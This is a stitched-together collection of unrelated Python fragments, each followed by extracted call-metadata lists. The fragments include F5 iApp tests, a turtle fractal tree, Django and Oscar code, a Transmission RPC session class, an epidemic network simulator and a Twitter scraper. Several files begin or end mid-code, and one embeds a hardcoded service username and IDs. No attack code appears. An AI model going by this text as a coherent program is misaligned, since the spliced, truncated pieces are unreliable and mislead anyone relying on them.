pkg_task.refresh()
if pkg_task.status in ['CANCELED', 'FAILED', 'FINISHED']:
pkg_task.delete()
break
assert pkg_task.__dict__['deleted']
def test_package_mgmt_tasks_collection(self, mgmt_root, iapp_lx):
col = mgmt_root.shared.iapp.package_management_tasks_s.get_collection()
assert isinstance(col, list)
assert len(col) > 0
def test_create_query_task(self, pkg_query_task):
assert pkg_query_task.operation == "QUERY"
assert pkg_query_task.kind == \
'shared:iapp:package-management-tasks:iapppackagemanagementtaskstate' # NOQA
| [
"io.StringIO",
"pytest.config.getoption",
"distutils.version.LooseVersion",
"pytest.fixture",
"pytest.raises"
] | [((943, 975), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""function"""'}), "(scope='function')\n", (957, 975), False, 'import pytest\n'), ((1343, 1375), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""function"""'}), "(scope='function')\n", (1357, 1375), False, 'import pytest\n'), ((1649, 1681), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""function"""'}), "(scope='function')\n", (1663, 1681), False, 'import pytest\n'), ((1046, 1064), 'io.StringIO', 'StringIO', (["(80 * 'a')"], {}), "(80 * 'a')\n", (1054, 1064), False, 'from io import StringIO\n'), ((866, 888), 'distutils.version.LooseVersion', 'LooseVersion', (['"""12.0.0"""'], {}), "('12.0.0')\n", (878, 888), False, 'from distutils.version import LooseVersion\n'), ((822, 858), 'pytest.config.getoption', 'pytest.config.getoption', (['"""--release"""'], {}), "('--release')\n", (845, 858), False, 'import pytest\n'), ((2204, 2228), 'pytest.raises', 'pytest.raises', (['HTTPError'], {}), '(HTTPError)\n', (2217, 2228), False, 'import pytest\n')] |
"""
功能:分形树
版本:1.0
日期:2018/08/19
"""
import turtle
def draw_branch(branch_length, pen_size):
if(branch_length > 0):
turtle.forward(branch_length)
turtle.right(20)
draw_branch(branch_length-10, pen_size)
turtle.left(40)
draw_branch(branch_length-10, pen_size)
turtle.right(20)
turtle.backward(branch_length)
def main():
# 画笔起始位置
turtle.right(90)
turtle.penup()
turtle.forward(300)
turtle.pendown()
turtle.left(90)
turtle.left(90)
draw_branch(100, 5)
turtle.exitonclick()
if __name__ == '__main__':
main()
| [
"turtle.backward",
"turtle.forward",
"turtle.exitonclick",
"turtle.right",
"turtle.penup",
"turtle.left",
"turtle.pendown"
] | [((415, 431), 'turtle.right', 'turtle.right', (['(90)'], {}), '(90)\n', (427, 431), False, 'import turtle\n'), ((436, 450), 'turtle.penup', 'turtle.penup', ([], {}), '()\n', (448, 450), False, 'import turtle\n'), ((455, 474), 'turtle.forward', 'turtle.forward', (['(300)'], {}), '(300)\n', (469, 474), False, 'import turtle\n'), ((479, 495), 'turtle.pendown', 'turtle.pendown', ([], {}), '()\n', (493, 495), False, 'import turtle\n'), ((500, 515), 'turtle.left', 'turtle.left', (['(90)'], {}), '(90)\n', (511, 515), False, 'import turtle\n'), ((521, 536), 'turtle.left', 'turtle.left', (['(90)'], {}), '(90)\n', (532, 536), False, 'import turtle\n'), ((565, 585), 'turtle.exitonclick', 'turtle.exitonclick', ([], {}), '()\n', (583, 585), False, 'import turtle\n'), ((142, 171), 'turtle.forward', 'turtle.forward', (['branch_length'], {}), '(branch_length)\n', (156, 171), False, 'import turtle\n'), ((180, 196), 'turtle.right', 'turtle.right', (['(20)'], {}), '(20)\n', (192, 196), False, 'import turtle\n'), ((254, 269), 'turtle.left', 'turtle.left', (['(40)'], {}), '(40)\n', (265, 269), False, 'import turtle\n'), ((327, 343), 'turtle.right', 'turtle.right', (['(20)'], {}), '(20)\n', (339, 343), False, 'import turtle\n'), ((352, 382), 'turtle.backward', 'turtle.backward', (['branch_length'], {}), '(branch_length)\n', (367, 382), False, 'import turtle\n')] |
# Generated by Django 2.1.4 on 2019-04-26 07:24
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0014_auto_20190417_1639'),
]
operations = [
migrations.AlterUniqueTogether(
name='documentpart',
unique_together={('order', 'document')},
),
]
| [
"django.db.migrations.AlterUniqueTogether"
] | [((224, 321), 'django.db.migrations.AlterUniqueTogether', 'migrations.AlterUniqueTogether', ([], {'name': '"""documentpart"""', 'unique_together': "{('order', 'document')}"}), "(name='documentpart', unique_together={(\n 'order', 'document')})\n", (254, 321), False, 'from django.db import migrations\n')] |
# Generated by Django 2.2.13 on 2021-07-22 14:49
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('des', '0032_auto_20210713_2127'),
]
operations = [
migrations.AlterField(
model_name='astrometryjob',
name='status',
field=models.IntegerField(choices=[(1, 'Idle'), (2, 'Running'), (3, 'Completed'), (4, 'Failed'), (5, 'Aborted'), (6, 'Warning'), (7, 'Launched')], default=1, verbose_name='Status'),
),
]
| [
"django.db.models.IntegerField"
] | [((340, 522), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'choices': "[(1, 'Idle'), (2, 'Running'), (3, 'Completed'), (4, 'Failed'), (5,\n 'Aborted'), (6, 'Warning'), (7, 'Launched')]", 'default': '(1)', 'verbose_name': '"""Status"""'}), "(choices=[(1, 'Idle'), (2, 'Running'), (3, 'Completed'),\n (4, 'Failed'), (5, 'Aborted'), (6, 'Warning'), (7, 'Launched')],\n default=1, verbose_name='Status')\n", (359, 522), False, 'from django.db import migrations, models\n')] |
import pytest
from pyformlang.finite_automaton import NondeterministicFiniteAutomaton
from project import BooleanMatrices
@pytest.fixture
def nfa():
nfa = NondeterministicFiniteAutomaton()
nfa.add_transitions(
[
(0, "X", 1),
(0, "X", 2),
(1, "Y", 2),
(1, "Z", 1),
(2, "S", 3),
(3, "W", 4),
(4, "W", 0),
]
)
return nfa
@pytest.mark.parametrize(
"label,expected_nnz", [("X", 2), ("Y", 1), ("Z", 1), ("S", 1), ("W", 2)]
)
def test_nonzero(nfa, label, expected_nnz):
bm = BooleanMatrices(nfa)
actual_nnz = bm.bool_matrices[label].nnz
assert actual_nnz == expected_nnz
def test_symbols(nfa):
bm = BooleanMatrices(nfa)
actual_symbols = bm.bool_matrices.keys()
expected_symbols = nfa.symbols
assert actual_symbols == expected_symbols
@pytest.mark.parametrize(
"label,edges",
[
("X", [(0, 1), (0, 2)]),
("Y", [(1, 2)]),
("Z", [(1, 1)]),
("S", [(2, 3)]),
("W", [(3, 4), (4, 0)]),
],
)
def test_adjacency(nfa, label, edges):
bm = BooleanMatrices(nfa)
assert all(bm.bool_matrices[label][edge] for edge in edges)
def test_transitive_closure(nfa):
bm = BooleanMatrices(nfa)
tc = bm.make_transitive_closure()
assert tc.sum() == tc.size
| [
"pyformlang.finite_automaton.NondeterministicFiniteAutomaton",
"pytest.mark.parametrize",
"project.BooleanMatrices"
] | [((441, 542), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""label,expected_nnz"""', "[('X', 2), ('Y', 1), ('Z', 1), ('S', 1), ('W', 2)]"], {}), "('label,expected_nnz', [('X', 2), ('Y', 1), ('Z', 1),\n ('S', 1), ('W', 2)])\n", (464, 542), False, 'import pytest\n'), ((888, 1033), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""label,edges"""', "[('X', [(0, 1), (0, 2)]), ('Y', [(1, 2)]), ('Z', [(1, 1)]), ('S', [(2, 3)]),\n ('W', [(3, 4), (4, 0)])]"], {}), "('label,edges', [('X', [(0, 1), (0, 2)]), ('Y', [(1,\n 2)]), ('Z', [(1, 1)]), ('S', [(2, 3)]), ('W', [(3, 4), (4, 0)])])\n", (911, 1033), False, 'import pytest\n'), ((162, 195), 'pyformlang.finite_automaton.NondeterministicFiniteAutomaton', 'NondeterministicFiniteAutomaton', ([], {}), '()\n', (193, 195), False, 'from pyformlang.finite_automaton import NondeterministicFiniteAutomaton\n'), ((598, 618), 'project.BooleanMatrices', 'BooleanMatrices', (['nfa'], {}), '(nfa)\n', (613, 618), False, 'from project import BooleanMatrices\n'), ((737, 757), 'project.BooleanMatrices', 'BooleanMatrices', (['nfa'], {}), '(nfa)\n', (752, 757), False, 'from project import BooleanMatrices\n'), ((1136, 1156), 'project.BooleanMatrices', 'BooleanMatrices', (['nfa'], {}), '(nfa)\n', (1151, 1156), False, 'from project import BooleanMatrices\n'), ((1266, 1286), 'project.BooleanMatrices', 'BooleanMatrices', (['nfa'], {}), '(nfa)\n', (1281, 1286), False, 'from project import BooleanMatrices\n')] |
# -*- coding: utf-8 -*-
from scripts import tabledef
from flask import session
from sqlalchemy.orm import sessionmaker
from contextlib import contextmanager
import bcrypt
import sys, subprocess, ipaddress, time, datetime, json, os, csv, copy
from watson_developer_cloud import DiscoveryV1
EnvID="5aec3469-82f9-49cb-9718-e3d0526a85f7"
ColID="ccc5a579-296d-445f-a4cf-9fd81c536e8d"
ConfID="e813ec51-af96-422f-943c-65d776818292"
@contextmanager
def session_scope():
"""Provide a transactional scope around a series of operations."""
s = get_session()
s.expire_on_commit = False
try:
yield s
s.commit()
except:
s.rollback()
raise
finally:
s.close()
def get_session():
return sessionmaker(bind=tabledef.engine)()
def get_natural_language_query(query):
#with session_scope() as s:
print("query is"+query)
discovery = DiscoveryV1(version='2018-03-05', username="9e523dc4-1206-4898-a30f-faf75cd8526b", password="<PASSWORD>")
my_query = discovery.query(environment_id=EnvID, collection_id=ColID, query=query, passages='true', passages_count='1', count=1, highlight='true')
p_passage=my_query['passages'][0]["passage_text"]
p_score=my_query['passages'][0]["passage_score"]
p_id=my_query['passages'][0]["document_id"]
querylist = [p_passage,p_score,p_id]
return querylist
| [
"sqlalchemy.orm.sessionmaker",
"watson_developer_cloud.DiscoveryV1"
] | [((911, 1021), 'watson_developer_cloud.DiscoveryV1', 'DiscoveryV1', ([], {'version': '"""2018-03-05"""', 'username': '"""9e523dc4-1206-4898-a30f-faf75cd8526b"""', 'password': '"""<PASSWORD>"""'}), "(version='2018-03-05', username=\n '9e523dc4-1206-4898-a30f-faf75cd8526b', password='<PASSWORD>')\n", (922, 1021), False, 'from watson_developer_cloud import DiscoveryV1\n'), ((745, 779), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', ([], {'bind': 'tabledef.engine'}), '(bind=tabledef.engine)\n', (757, 779), False, 'from sqlalchemy.orm import sessionmaker\n')] |
# -*- coding: utf-8 -*-
from celery.task import task
@task
def publish_recipe(recipe):
from recipes.models import Recipe
try:
recipe = Recipe.objects.get(id=recipe.id)
recipe.published=True
recipe.save()
except Recipe.DoesNotExist:
pass | [
"recipes.models.Recipe.objects.get"
] | [((141, 173), 'recipes.models.Recipe.objects.get', 'Recipe.objects.get', ([], {'id': 'recipe.id'}), '(id=recipe.id)\n', (159, 173), False, 'from recipes.models import Recipe\n')] |
# Copyright (c) 2018-2021 Trim21 <<EMAIL>>
# Copyright (c) 2008-2014 <NAME> <<EMAIL>>
# Licensed under the MIT license.
from typing import TYPE_CHECKING, Any, Dict, Tuple, Union, Generator
from typing_extensions import Literal
from transmission_rpc.lib_types import Field
if TYPE_CHECKING:
from transmission_rpc.client import Client
class Session:
"""
Session is a dict-like class holding the session data for a Transmission daemon.
Access the session field can be done through attributes.
The attributes available are the same as the session arguments in the
Transmission RPC specification, but with underscore instead of hyphen.
get ``'download-dir'`` with ``session.download_dir``.
.. code-block:: python
session = Client().get_session()
current = session.download_dir
there are also setter like ``Session().download_dir = '/path/to/download'``
.. code-block:: python
session = Client().get_session()
session.download_dir = '/path/to/new/download/dir'
if you want to batch update a session, call ``.update(data)``
.. code-block:: python
session = Client().get_session()
session.update({'k1': 'v1', "k2": "v2"})
if you have to access to the private ``Session()._fields``,
keys are stored with underscore.
"""
def __init__(self, client: "Client", fields: Dict[str, Any] = None):
self._client = client
self._fields: Dict[str, Field] = {}
if fields is not None:
self._update(fields)
def __getattr__(self, name: str) -> Any:
try:
return self._fields[name].value
except KeyError as e:
raise AttributeError(f"No attribute {name}") from e
def _set(self, key: str, value: Any, commit: bool = False) -> None:
key = key.replace("-", "_")
current_field = self._fields.get(key)
if current_field is None:
self._fields[key] = Field(value, True)
else:
if current_field.value != value:
self._fields[key] = Field(value, True)
if commit:
self._commit(key, value)
def __str__(self) -> str:
text = ""
max_length = max(len(x) for x in self._fields.keys()) + 1
for key, value in sorted(self._fields.items(), key=lambda x: x[0]):
text += f"{key.ljust(max_length)}: {value.value!r}\n"
return text
def _commit(self, key: str = None, value: Any = None) -> None:
"""submit all dirty field to client"""
dirty = {}
if key is not None and value is not None:
dirty[key] = value
else:
for k, v in self._fields.items():
if v.dirty:
dirty[k] = v.value
self._client.set_session(**dirty)
def _update(self, other: Union[Dict[str, Any], "Session"]) -> None:
if isinstance(other, dict):
for key, value in other.items():
self._set(key, value)
elif isinstance(other, Session):
for key, value in other._fields.items():
self._set(key, value.value)
else:
raise ValueError("Cannot update with supplied data")
def update(self, other: Union[Dict[str, Any], "Session"]) -> None:
"""
Update the session data from a Transmission JSON-RPC arguments dictionary
"""
self._update(other)
self._commit()
def keys(self) -> Generator[str, None, None]:
"""
session keys with underscore (eg: ``download_dir``)
"""
yield from self._fields.keys()
def values(self) -> Generator[Any, None, None]:
for value in self._fields.values():
yield value.value
def items(self) -> Generator[Tuple[str, Any], None, None]:
"""
iter key,value pair
hyphen in key is replace by underscore. (eg: ``'download_dir'``)
"""
for key, field in self._fields.items():
yield key, field.value
@property
def download_dir(self) -> str:
"""default download location
- rpc version 12
- transmission version 2.20
:return:
"""
return self.__getattr__("download_dir")
@download_dir.setter
def download_dir(self, location: str) -> None:
"""Enable/disable peer exchange."""
if isinstance(location, str) and location:
self._set("download_dir", location, True)
else:
raise TypeError(f"{location!r} if not a valid 'download-dir'")
@property
def version(self) -> str:
"""
- rpc version 3
- transmission version 1.41
"""
return self.__getattr__("version")
@property
def rpc_version(self) -> int:
"""
- rpc version 4
- transmission version 1.50
"""
return self.__getattr__("rpc_version")
@property
def peer_port(self) -> int:
"""Get the peer port.
- rpc version 5
- transmission version 1.60
"""
return self.__getattr__("peer_port")
@peer_port.setter
def peer_port(self, port: int) -> None:
"""Set the peer port.
- rpc version 5
- transmission version 1.60
"""
if isinstance(port, int):
self._set("peer_port", port, True)
else:
raise ValueError("Not a valid limit")
@property
def pex_enabled(self) -> bool:
"""Is peer exchange enabled
- rpc version 5
- transmission version 1.60"""
return self.__getattr__("pex_enabled")
@pex_enabled.setter
def pex_enabled(self, enabled: bool) -> None:
"""Enable/disable peer exchange."""
if isinstance(enabled, bool):
self._set("pex_enabled", enabled, True)
else:
raise TypeError("Not a valid type")
@property
def encryption(self) -> str:
return self.__getattr__("encryption")
@encryption.setter
def encryption(self, value: Literal["required", "preferred", "tolerated"]) -> None:
if value in {"required", "preferred", "tolerated"}:
self._set("encryption", value, commit=True)
else:
raise ValueError(
"Not a valid encryption, can only be one of ['required', 'preferred', 'tolerated']"
)
| [
"transmission_rpc.lib_types.Field"
] | [((1972, 1990), 'transmission_rpc.lib_types.Field', 'Field', (['value', '(True)'], {}), '(value, True)\n', (1977, 1990), False, 'from transmission_rpc.lib_types import Field\n'), ((2086, 2104), 'transmission_rpc.lib_types.Field', 'Field', (['value', '(True)'], {}), '(value, True)\n', (2091, 2104), False, 'from transmission_rpc.lib_types import Field\n')] |
from decimal import Decimal as D
from django.test import TestCase
from nose.plugins.attrib import attr
import mock
from oscar.apps.shipping import methods
from oscar.apps.shipping.models import OrderAndItemCharges
@attr('shipping')
class TestStandardMethods(TestCase):
def setUp(self):
self.non_discount_methods = [
methods.Free(),
methods.FixedPrice(D('10.00'), D('10.00')),
OrderAndItemCharges(price_per_order=D('5.00'),
price_per_item=D('1.00'))]
def test_have_is_discounted_property(self):
for method in self.non_discount_methods:
self.assertFalse(method.is_discounted)
class TestDiscountingMethodsWithoutTax(TestCase):
def setUp(self):
self.base_method = methods.FixedPrice(D('10.00'))
offer = mock.Mock()
offer.shipping_discount = mock.Mock(
return_value=D('5.00'))
self.method = methods.TaxExclusiveOfferDiscount(
self.base_method, offer)
def test_delegates_properties_onto_wrapped_method(self):
self.assertFalse(self.method.is_tax_known)
self.assertEqual(
self.method.charge_excl_tax_before_discount, D('10.00'))
self.assertEqual(self.method.code, self.base_method.code)
self.assertEqual(self.method.name, self.base_method.name)
self.assertEqual(self.method.description,
self.base_method.description)
def test_discounts_charge(self):
self.assertEqual(self.method.charge_excl_tax, D('5.00'))
def test_correctly_sets_tax(self):
self.method.tax = D('2.00')
self.assertTrue(self.method.is_tax_known)
self.assertEqual(self.method.charge_incl_tax, D('7.00'))
| [
"decimal.Decimal",
"oscar.apps.shipping.methods.TaxExclusiveOfferDiscount",
"mock.Mock",
"oscar.apps.shipping.methods.Free",
"nose.plugins.attrib.attr"
] | [((219, 235), 'nose.plugins.attrib.attr', 'attr', (['"""shipping"""'], {}), "('shipping')\n", (223, 235), False, 'from nose.plugins.attrib import attr\n'), ((832, 843), 'mock.Mock', 'mock.Mock', ([], {}), '()\n', (841, 843), False, 'import mock\n'), ((947, 1005), 'oscar.apps.shipping.methods.TaxExclusiveOfferDiscount', 'methods.TaxExclusiveOfferDiscount', (['self.base_method', 'offer'], {}), '(self.base_method, offer)\n', (980, 1005), False, 'from oscar.apps.shipping import methods\n'), ((1633, 1642), 'decimal.Decimal', 'D', (['"""2.00"""'], {}), "('2.00')\n", (1634, 1642), True, 'from decimal import Decimal as D\n'), ((345, 359), 'oscar.apps.shipping.methods.Free', 'methods.Free', ([], {}), '()\n', (357, 359), False, 'from oscar.apps.shipping import methods\n'), ((804, 814), 'decimal.Decimal', 'D', (['"""10.00"""'], {}), "('10.00')\n", (805, 814), True, 'from decimal import Decimal as D\n'), ((1215, 1225), 'decimal.Decimal', 'D', (['"""10.00"""'], {}), "('10.00')\n", (1216, 1225), True, 'from decimal import Decimal as D\n'), ((1556, 1565), 'decimal.Decimal', 'D', (['"""5.00"""'], {}), "('5.00')\n", (1557, 1565), True, 'from decimal import Decimal as D\n'), ((1747, 1756), 'decimal.Decimal', 'D', (['"""7.00"""'], {}), "('7.00')\n", (1748, 1756), True, 'from decimal import Decimal as D\n'), ((392, 402), 'decimal.Decimal', 'D', (['"""10.00"""'], {}), "('10.00')\n", (393, 402), True, 'from decimal import Decimal as D\n'), ((404, 414), 'decimal.Decimal', 'D', (['"""10.00"""'], {}), "('10.00')\n", (405, 414), True, 'from decimal import Decimal as D\n'), ((914, 923), 'decimal.Decimal', 'D', (['"""5.00"""'], {}), "('5.00')\n", (915, 923), True, 'from decimal import Decimal as D\n'), ((465, 474), 'decimal.Decimal', 'D', (['"""5.00"""'], {}), "('5.00')\n", (466, 474), True, 'from decimal import Decimal as D\n'), ((523, 532), 'decimal.Decimal', 'D', (['"""1.00"""'], {}), "('1.00')\n", (524, 532), True, 'from decimal import Decimal as D\n')] |
# Network
import numpy as np
import pandas as pd
import simulator
import random
from igraph import *
import matplotlib.pyplot as plt
class Network():
"""docstring for Network"""
def __init__(self, simulator):
# Genero un grafo random
self.g = Graph.Erdos_Renyi(simulator.num_nodi,simulator.p_link)
# Inizializzazione dei vettori degli step temporali e degli stati epidemici
self.t_state = np.zeros((simulator.num_nodi,1))
self.e_state = np.zeros((simulator.num_nodi,1),dtype=np.int8)
# assegnazione iniziale random dei nodi esposti
np.put(self.e_state,np.random.choice(range(simulator.num_nodi*1), simulator.exp0, replace=False),1)
self.states = {} # Lista degli stati
self.data = pd.DataFrame(columns=["index","days","exposed","infected","severe infected","recovered","dead","susceptible","total"]) # Tabella stati
def update_states(self,i,simulator): # Aggiornamento degli stati
"""Lista degli stati:
- Susceptible = 0
- Exposed = 1
- Infected = 2
- Severe Infected = 3
- Recovered = 4
- Dead = 5
"""
# Copia degli stati epidemici dagli array degli stati epidemici al dizionario
self.states = { 'exposed':np.where(np.copy(self.e_state)==1,self.e_state,0),
'infected':np.where(np.copy(self.e_state)==2,self.e_state,0),
'recovered':np.where(np.copy(self.e_state)==4,self.e_state,0),
'severe_infected':np.where(np.copy(self.e_state)==3,self.e_state,0),
'dead':np.where(np.copy(self.e_state)==5,self.e_state,0),
'susceptible':(simulator.num_nodi - np.count_nonzero(np.copy(self.e_state))),
'total_cases':np.count_nonzero(np.copy(self.e_state)) }
# Inserimento della somma di ogni stato epidemico nel dataframe
self.data.loc[i,:] = [i, i*simulator.dt_state,np.count_nonzero(self.states['exposed']), np.count_nonzero(self.states['infected']),
np.count_nonzero(self.states['severe_infected']), np.count_nonzero(self.states['recovered']),
np.count_nonzero(self.states['dead']), self.states['susceptible'], self.states['total_cases']]
#print(self.data)
def plot(self,i,simulator): # Creazione Grafici
plt.clf()
ax = plt.gca()
self.data.plot(x = 'days', y = 'susceptible', kind = 'line', color = 'cyan', ax = ax)
self.data.plot(x = 'days', y = 'exposed', kind = 'line', color = 'yellow', ax = ax)
self.data.plot(x = 'days', y = 'infected', kind = 'line', color = 'blue', ax = ax)
self.data.plot(x = 'days', y = 'severe infected', kind = 'line', color = 'magenta', ax = ax)
self.data.plot(x = 'days', y = 'recovered', kind = 'line', color = 'green', ax = ax)
self.data.plot(x = 'days', y = 'dead', kind = 'line', color = 'brown', ax = ax)
plt.title('link_p: {}; exp0: {}; t_inc: {}; t_inf: {}\n alpha: {}; beta: {}; gamma: {}'.format(simulator.p_link, simulator.exp0,simulator.t_exp,simulator.t_inf,simulator.alfa,simulator.beta,simulator.gamma))
plt.xlabel('Time (days)')
plt.ylabel('Number of nodes')
plt.savefig('./plots/states.png')
def update_nodes(self,i,simulator): # Aggiornamento dei nodi del network (rimozione dei nodi morti e isolamento dei nodi gravemente infetti)
pass
def get_new_cases(self,i,simulator): # Nuovi casi (aggiornamento dei nodi che propagano l'epidemia)
# Trova i vicini degli esposti, infetti e gravemente infetti
# Calcola la probabilità che i vicini siano contaggiati con tasso alfa
# Nodi esposti
n_exp = np.array(np.nonzero(self.states['exposed'])[0])
# Nodi infetti
n_inf = np.array(np.nonzero(self.states['infected'])[0])
# Nodi gravemente infetti
n_g_inf = np.array(np.nonzero(self.states['severe_infected'])[0])
# Nodi guariti
n_rec = np.array(np.nonzero(self.states['recovered'])[0])
# Nodi morti
n_dead = np.array(np.nonzero(self.states['dead'])[0])
new_cases = []
# Ciclo i Nodi esposti, infetti e gravemente infetti e trovo i loro vicini suscettibili che vengono contaggiati con tasso alfa
contaggiosi = np.concatenate((n_exp,n_inf,n_g_inf), axis=None)
for x in contaggiosi:
for n in self.g.neighbors(x):
Rand = np.random.random()
# Condizione per entrare nei nuovi casi di esposto (Rientra nella prob, non è nella categoria contaggiati, ne in quella guariti ne in quella morti, nemmeno doppione)
if (Rand<simulator.alfa) and (n not in contaggiosi) and (n not in n_rec) and (n not in n_dead) and (n not in new_cases):
new_cases.append(n)
#print(new_cases)
return new_cases
| [
"pandas.DataFrame",
"numpy.count_nonzero",
"numpy.concatenate",
"numpy.copy",
"matplotlib.pyplot.clf",
"numpy.zeros",
"numpy.nonzero",
"numpy.random.random",
"matplotlib.pyplot.gca",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.savefig"
] | [((408, 441), 'numpy.zeros', 'np.zeros', (['(simulator.num_nodi, 1)'], {}), '((simulator.num_nodi, 1))\n', (416, 441), True, 'import numpy as np\n'), ((458, 506), 'numpy.zeros', 'np.zeros', (['(simulator.num_nodi, 1)'], {'dtype': 'np.int8'}), '((simulator.num_nodi, 1), dtype=np.int8)\n', (466, 506), True, 'import numpy as np\n'), ((718, 848), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['index', 'days', 'exposed', 'infected', 'severe infected', 'recovered',\n 'dead', 'susceptible', 'total']"}), "(columns=['index', 'days', 'exposed', 'infected',\n 'severe infected', 'recovered', 'dead', 'susceptible', 'total'])\n", (730, 848), True, 'import pandas as pd\n'), ((2123, 2132), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (2130, 2132), True, 'import matplotlib.pyplot as plt\n'), ((2141, 2150), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (2148, 2150), True, 'import matplotlib.pyplot as plt\n'), ((2888, 2913), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Time (days)"""'], {}), "('Time (days)')\n", (2898, 2913), True, 'import matplotlib.pyplot as plt\n'), ((2916, 2945), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Number of nodes"""'], {}), "('Number of nodes')\n", (2926, 2945), True, 'import matplotlib.pyplot as plt\n'), ((2948, 2981), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""./plots/states.png"""'], {}), "('./plots/states.png')\n", (2959, 2981), True, 'import matplotlib.pyplot as plt\n'), ((3934, 3984), 'numpy.concatenate', 'np.concatenate', (['(n_exp, n_inf, n_g_inf)'], {'axis': 'None'}), '((n_exp, n_inf, n_g_inf), axis=None)\n', (3948, 3984), True, 'import numpy as np\n'), ((1769, 1809), 'numpy.count_nonzero', 'np.count_nonzero', (["self.states['exposed']"], {}), "(self.states['exposed'])\n", (1785, 1809), True, 'import numpy as np\n'), ((1811, 1852), 'numpy.count_nonzero', 'np.count_nonzero', (["self.states['infected']"], {}), "(self.states['infected'])\n", (1827, 1852), True, 'import numpy as np\n'), ((1856, 1904), 'numpy.count_nonzero', 'np.count_nonzero', (["self.states['severe_infected']"], {}), "(self.states['severe_infected'])\n", (1872, 1904), True, 'import numpy as np\n'), ((1906, 1948), 'numpy.count_nonzero', 'np.count_nonzero', (["self.states['recovered']"], {}), "(self.states['recovered'])\n", (1922, 1948), True, 'import numpy as np\n'), ((1952, 1989), 'numpy.count_nonzero', 'np.count_nonzero', (["self.states['dead']"], {}), "(self.states['dead'])\n", (1968, 1989), True, 'import numpy as np\n'), ((1628, 1649), 'numpy.copy', 'np.copy', (['self.e_state'], {}), '(self.e_state)\n', (1635, 1649), True, 'import numpy as np\n'), ((3409, 3443), 'numpy.nonzero', 'np.nonzero', (["self.states['exposed']"], {}), "(self.states['exposed'])\n", (3419, 3443), True, 'import numpy as np\n'), ((3484, 3519), 'numpy.nonzero', 'np.nonzero', (["self.states['infected']"], {}), "(self.states['infected'])\n", (3494, 3519), True, 'import numpy as np\n'), ((3573, 3615), 'numpy.nonzero', 'np.nonzero', (["self.states['severe_infected']"], {}), "(self.states['severe_infected'])\n", (3583, 3615), True, 'import numpy as np\n'), ((3656, 3692), 'numpy.nonzero', 'np.nonzero', (["self.states['recovered']"], {}), "(self.states['recovered'])\n", (3666, 3692), True, 'import numpy as np\n'), ((3732, 3763), 'numpy.nonzero', 'np.nonzero', (["self.states['dead']"], {}), "(self.states['dead'])\n", (3742, 3763), True, 'import numpy as np\n'), ((4052, 4070), 'numpy.random.random', 'np.random.random', ([], {}), '()\n', (4068, 4070), True, 'import numpy as np\n'), ((1184, 1205), 'numpy.copy', 'np.copy', (['self.e_state'], {}), '(self.e_state)\n', (1191, 1205), True, 'import numpy as np\n'), ((1252, 1273), 'numpy.copy', 'np.copy', (['self.e_state'], {}), '(self.e_state)\n', (1259, 1273), True, 'import numpy as np\n'), ((1322, 1343), 'numpy.copy', 'np.copy', (['self.e_state'], {}), '(self.e_state)\n', (1329, 1343), True, 'import numpy as np\n'), ((1398, 1419), 'numpy.copy', 'np.copy', (['self.e_state'], {}), '(self.e_state)\n', (1405, 1419), True, 'import numpy as np\n'), ((1463, 1484), 'numpy.copy', 'np.copy', (['self.e_state'], {}), '(self.e_state)\n', (1470, 1484), True, 'import numpy as np\n'), ((1565, 1586), 'numpy.copy', 'np.copy', (['self.e_state'], {}), '(self.e_state)\n', (1572, 1586), True, 'import numpy as np\n')] |
from django.contrib import admin
# Register your models here.
from .models import shortenedUrl
admin.site.register(shortenedUrl) | [
"django.contrib.admin.site.register"
] | [((97, 130), 'django.contrib.admin.site.register', 'admin.site.register', (['shortenedUrl'], {}), '(shortenedUrl)\n', (116, 130), False, 'from django.contrib import admin\n')] |
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from future import standard_library
import twitter_scraper as twitter_scraper
import json
import codecs
standard_library.install_aliases()
def main():
def build_list(t, tweet_list):
tweet_list.append(
{
"username": t.username,
"retweet": t.retweets,
"tweet": t.text,
"mentions": t.mentions,
"hashtags": t.hashtags,
"date": t.date.__str__()
}
)
return tweet_list
def print_to_file(data, filename):
try:
with codecs.open(filename + '.json', 'a', 'utf-8') as f:
f.write(data)
return True
except BaseException as e:
print(e)
search_term = '@meshivammathur'
search_params = twitter_scraper.scraper.SearchParams().set_username(search_term).set_max_tweets(400)
tweets = twitter_scraper.scraper.Scraper.get_tweets(search_params)
t_list = []
for tweet in tweets:
t_list = build_list(tweet, t_list)
json_data = json.dumps(t_list, indent=4)
print_to_file(json_data, search_term)
if __name__ == '__main__':
main()
| [
"codecs.open",
"twitter_scraper.scraper.Scraper.get_tweets",
"future.standard_library.install_aliases",
"json.dumps",
"twitter_scraper.scraper.SearchParams"
] | [((253, 287), 'future.standard_library.install_aliases', 'standard_library.install_aliases', ([], {}), '()\n', (285, 287), False, 'from future import standard_library\n'), ((1052, 1109), 'twitter_scraper.scraper.Scraper.get_tweets', 'twitter_scraper.scraper.Scraper.get_tweets', (['search_params'], {}), '(search_params)\n', (1094, 1109), True, 'import twitter_scraper as twitter_scraper\n'), ((1211, 1239), 'json.dumps', 'json.dumps', (['t_list'], {'indent': '(4)'}), '(t_list, indent=4)\n', (1221, 1239), False, 'import json\n'), ((731, 776), 'codecs.open', 'codecs.open', (["(filename + '.json')", '"""a"""', '"""utf-8"""'], {}), "(filename + '.json', 'a', 'utf-8')\n", (742, 776), False, 'import codecs\n'), ((954, 992), 'twitter_scraper.scraper.SearchParams', 'twitter_scraper.scraper.SearchParams', ([], {}), '()\n', (990, 992), True, 'import twitter_scraper as twitter_scraper\n')] |
import yaml
import click
from accelbyte_py_sdk.api.iam import admin_get_banned_users_v3
from ._utils import login_as as login_as_internal
@click.command()
